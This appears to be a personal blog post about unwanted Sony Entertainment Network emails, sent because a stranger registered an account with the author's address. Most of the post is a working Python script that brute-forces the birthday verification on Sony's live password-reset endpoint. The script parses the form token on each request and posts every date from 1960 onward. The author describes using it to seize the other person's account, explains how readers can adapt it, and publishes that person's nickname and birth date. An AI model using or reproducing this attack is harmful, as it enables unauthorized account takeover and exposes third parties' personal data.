Sony Entertainment Network spam stopper
I don’t have a Sony PlayStation. But someone nicknamed “STRONDHA” has one, and somehow he managed to use my personal e-mail address to create his account. Oddly, Sony didn’t send any e-mail asking to confirm my e-mail as the owner of the account, and starting spamming every time this person bought a game in their virtual store.
Stop it
My name is too common, and is not the first time I get subscribed to some site I didn’t ask to. Sometimes, I just click on the “unsubscribe” link, or even on “forgot my password” and do whatever I need to stop receiving undesired e-mails.
So, I tried the “forget my password” trick with Sony, and after some captcha validation, I received an e-mail with a link. The problem is that they required the birthday in order to reset the password, and of course, I don’t know the birthday of the person that created the account.
Enters python script to try every possible birthday date from 1/1/1960 until today.
Notes
-
You will need to change the base URL to whatever you received in the password reset e-mail from Sony
-
You might need to change the ‘wrong date’ message to match your local language – mine is in portuguese (just try any date on the browser, and -unless you’re so lucky to select the actual birth date- copy and paste the error message on the code)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import urllib
import urllib2
import datetime
import sys
import time
from HTMLParser import HTMLParser
# create a subclass and override the handler methods
class MyHTMLParser(HTMLParser):
def handle_starttag(self, tag, attrs):
attrs_dict = dict(attrs)
if tag == "input" and attrs_dict.get('name', '') == "blah_token":
setattr(self, "value", attrs_dict.get("value"))
def handle_endtag(self, tag):
pass
def handle_data(self, data):
pass
values = {
'struts.token.name' : 'blah_token',
'blah_token': '',
'verifyType': 'dob',
'account.dob': '1',
'account.mob': '1',
'account.yob': '1980',
}
#
# IMPORTANT: paste the URL received in the change password e-mail in the url variable, the url looks something like this:
# https://account.sonyentertainmentnetwork.com/reg/account/validate-forgot-password-token!input.action?token=***some token here***&request_locale=pt_BR&service-entity=np
#
url = '*** PASTE URL HERE ***'
url_post = "https://account.sonyentertainmentnetwork.com/liquid/reg/account/forgot-password-verify-identity.action"
s = requests.session()
r = s.get(url)
date = datetime.datetime(1960, 1, 1, 1, 1, 1)
today = datetime.datetime.today()
while date < today:
date += datetime.timedelta(days=1)
# find token
parser = MyHTMLParser()
parser.feed(r.text)
if not hasattr(parser, "value"):
print "!!!!! FOUND %s" % date.isoformat()
break
val = getattr(parser, "value")
print "blah_token = %r" % val
values['blah_token'] = val
values['account.dob'] = str(date.day)
values['account.mob'] = str(date.month)
values['account.yob'] = str(date.year)
r = s.post(url_post, values)
#
# IMPORTANT: The message is in portuguese, you will need to change this message to match your language
#
if u'A data de nascimento inserida é inválida. Verifique a data e tente novamente.' in r.text:
print "birthday is not %s" % date.isoformat()
else:
print "!!!!! FOUND %s" % date.isoformat()
break
sys.stdout.flush()STHRONDHA was born on January 23 of 1983 (or at least that’s the date he choose when creating his account). So, now I was able to change the password and stop receiving e-mails from Sony. I guess he will need to create a new account now muahahaha.
Comments